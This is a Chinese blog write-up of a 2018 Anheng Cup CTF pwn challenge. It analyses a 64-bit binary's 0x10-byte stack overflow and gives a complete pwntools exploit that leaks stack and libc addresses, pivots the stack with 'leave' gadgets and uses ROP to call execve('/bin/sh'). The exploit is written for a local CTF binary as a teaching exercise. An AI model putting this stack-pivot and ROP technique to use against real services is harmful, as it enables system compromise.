2018 安恒杯 6 月 pwn - over

最新推荐文章于 2022-12-30 00:10:14 发布
最新推荐文章于 2022-12-30 00:10:14 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: pwn 文章标签: pwn 64
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/82949474
版权

题目链接 找不到了

先用ida分析一下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  while ( sub_400676() )
    ;
  return 0LL;
}

int sub_400676()
{
  char buf; // [rsp+0h] [rbp-50h]

  memset(&buf, 0, 0x50uLL);
  putchar(62);
  read(0, &buf, 0x60uLL);
  return puts(&buf);
}

checksec
[*] '/home/hu/\xe6\x96\x87\xe6\xa1\xa3/over/over.over'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

可以看出这个程序读入最大的长度为0x60,而栈长度为0x50,所以我们最多可以覆盖到rbp 和 ret addr,无法在ret后的地址构造rop chain,所以我们rop chain放在栈上 0x50,重点要控制住rsp,使得rsp能够转移到rbp-0x50处。

  1. 泄露栈地址
  2. 算出sub_400676_ebp - 0x50
  3. 找到gadget -->  leave == mov rsp , rbp ;pop rbp
  4. 调用两次leave,使得rsp跳到 sub_400676_ebp - 0x50 处
  5. 执行rop chain

exp如下

from pwn import *
context.binary = "./over.over"

def DEBUG(cmd):
    raw_input("DEBUG: ")
    gdb.attach(io, cmd)

io = process("./over.over")
elf = ELF("./over.over")
libc = elf.libc

io.sendafter(">", 'a' * 80)
stack = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\0')) - 0x70 #泄露rbp,同时算出stack=sub_400676_rbp- 0x50
success("stack -> {:#x}".format(stack)) 
# 之所以 -0x70 是因为 rbp里面存的是 main的rbp,stacke=sub_400676_rbp-0x50=(main_rbp-0x20)-0x50
'''
ROPgadget  --binary ./over.over  --only "|pop|ret"
Gadgets information
============================================================
0x0000000000400793 : pop rdi ; ret
'''
pop_rdi_ret=0x400793

# leave 0x4006be

io.sendafter(">", flat(['99999999', pop_rdi_ret, elf.got['puts'], elf.plt['puts'], 0x400676, (80 - 40) * '1', stack, 0x4006be]))#第一个元素可以随便填,因为再次调用sub_400676时会再次把rbp覆盖不影响rsp的方向
libc.address = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\0')) - libc.sym['puts']
success("libc.address -> {:#x}".format(libc.address))


'''
$ ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --only "pop|ret"
Gadgets information
============================================================
0x00000000001306d9 : pop rdx ; pop rsi ; ret
'''
pop_rdx_pop_rsi_ret=libc.address+0x00000000001306d9
success("pop_rdx_pop_rsi_ret->{:#x}".format(pop_rdx_pop_rsi_ret))

payload=flat(['88888888', pop_rdi_ret, next(libc.search("/bin/sh")),pop_rdx_pop_rsi_ret,p64(0),p64(0), libc.sym['execve'], (80 - 7*8 ) * '2', stack - 0x30, 0x4006be])
#执行到这一步的时0x30=sub_400676_rbp-rsp
io.sendafter(">", payload)

io.interactive()

 

Maxmalloc
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【4.29安恒杯】writeup
wintersun的地带
04-19 1万+
#### 安恒杯_writeup 以下为比赛中做出的题目MISC: SHOW ME THE FLAGCRYPTO: LAZYATTACK这一题很巧,全部的队伍里面只有我们一个队伍将其做出来。 这一题做出来完完全全是靠运气,在当我做出这一题的时候感觉是懵逼的,完全不知道是怎么回事,flag一下子就出来了而且对了,很兴奋。队友都相互说用了和出题人同一个软件,才得到的答案。结果确实是和出题人用
[PWN]安恒杯2019.2 filesystem
Hello World.c
02-24 676
之前一直玩逆向,鉴于逆向和pwn都算同一类,寒假花了点时间补了下。 由于自己太菜,被几个函数误导了好久。。。。最后到点刚好解出来,没 能来得及提交。。。被自己蠢哭了 main函数很简单,各种菜单输入匹配,一眼就看到个B4cKd0oR 可疑的很!更进去看看是啥 看到个system,那不是简单了,立马输入B4cKd0oR,键入ls命令 程序返回了服务器上的文件目录,看到一个fl...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 1845
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
2018 6安恒杯
weixin_40423072的博客
09-03 1821
更一下比赛的 解析吧。安恒杯的 三题web,唔,平台关了所以,链接就 随缘了! 第一题 嗯,遇到就点吧,点击的时候页面不会跳转但是还是会有反应的,如果右键打开之后会有新的路径,后面有跟一个microsoft 的教程。那 这题就是一个 注入吧 但是常规注入并不能注入进去,无奈。Redis的注入也没有,于是看了解析之后我们就很自然的可以想到MongoDB注入,怎么说呢。只要想到他就能做出来,百度一...
2018 - 安恒杯 - babypie [stack partial overwrite]
ACdream
02-13 1218
明显的是缓冲区溢出呀,read函数可以多读 64位程序,开启了NX和PIE,且程序里有了system("/bin/sh") 目标:控制RIP到A3E函数即可~ 首先,要处理canary的问题~然后,覆盖返回地址~ partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址 exp如下: #!/usr/bin/e...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
安恒杯-misc-附件资源
03-05
安恒杯-misc-附件资源
2018-10安恒逆向题目
10-29
2018年10安恒赛逆向题目。
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
2018 强网杯 安恒杯 部分write up
ayg14593的博客
03-27 279
蜘蛛侠啊 安恒杯misc linux tshark identity 部分指令 附件下载 https://pan.baidu.com/s/1uo0GFufTjMqR8rtBzp5PlQ 密码 2cq5 首先打开附件pcap包 茫茫多的icmp包 稍微看一下似乎每个包内容都不太一样 但是 $$START$$ 似乎暗示了什么 看看最后一个ICMP...
花式栈溢出技巧----stack pivoting/frame faking
qq_42192672的博客
10-14 1226
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/                   https://www.jianshu.com/p/c53627895330 1.stack pivoting 转移堆  以 X-CTF Quals 2016 - b0verfl0w 为例学习 #若可溢出...
【环境】docker pwn机配置
woodwhale的博客
12-16 5831
【环境】docker pwn机配置 前言 由于自己的荣耀轻薄本装了双系统(ubuntu20.04和win10),每次在打ctf比赛的时候基本上都是使用ubuntu系统来做pwn和misc,每次做学校的作业基本都要用office之类的工具(ubuntu虽然也有wps支持但是还是挺不习惯的)。加上近期学了docker的部分知识,于是先要用docker+ubuntu+vnc+pwntools的方式配置一台属于自己的docker pwn机。 虽然github上已经有很多版本的pwn机,但是还是想自己动手做一台。 d
攻防世界pwn——dice_game
qq_62076255的博客
12-19 422
攻防世界pwn——dice_game做题记录
CTFd平台使用docker配置pwn题目
weixin_53757397的博客
12-30 2513
零基础如何利用docker和dockerhub平台给CTFd平台出pwn题。
安恒杯EIS2017 writeup
Aurora的博客
11-07 6099
上星期参加了安恒杯EIS2017,记录一下。 Misc   签到题   扫二维码可得     隐藏在黑夜里的秘密   下载压缩包,打开时提示加密,猜测可能是伪加密,于是用 010editor 把加密位去掉,置为 0。然后解压压缩包,发现里面有个 flag,怀着激动的心情打开一看,结果是这样的:   夜已降临之时, 我将自己裹在深邃的黑暗中, 在夜的最深处 期待
180125 逆向-安恒杯18-01-Re
whklhhhh的博客
01-27 1526
1625-5 王子昂 总结《2018年125日》 【连续第482天总结】 A. 安恒杯18年1逆向WP B. 比赛的时候在冬令营,当天比较忙所以没来得及做。。 现在复现一下-0-可惜只有这一题是逆向拖入64位IDA反编译,main函数倒是摆在面前,然而有一千多行的伪代码。。。OTZ在linux中运行,发现有一句提示输入Show me the right key and I will g
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 4110
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
安恒6赛部分做题记录
0verWatch的博客
06-23 2872
前言 这次比赛恰逢别的学校考试,感觉题目有点水,但还是得记录一下 正文 Web1 Mynote 这道题目一开始我死扣xss发现无路可循后面经别人小小提醒之后,原来是个炒鸡弱智的反序列化题目,不多说 上图,在robots.txt里面发现几个可疑的页面,可能有用先记录着,直接访问flag.php是个假的flag。。 经过别人的提示,是反序列化以后,多抓几个包看一下 在uplo...
2019安恒一PWN题目题目
weixin_41293827的博客
02-26 956
链接:https://pan.baidu.com/s/1bQtCIPGeLvLSgmtJfBTKIg 提取码:30be
安恒堡垒机 root密码
最新发布
09-08
安恒堡垒机是一款网络安全产品,用于管理和控制企业的网络设备,保障网络的安全。其中的root密码是用于登录和操作安恒堡垒机的超级管理员账户。 root密码在安恒堡垒机中具有最高的权限,只有拥有root密码的用户才能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值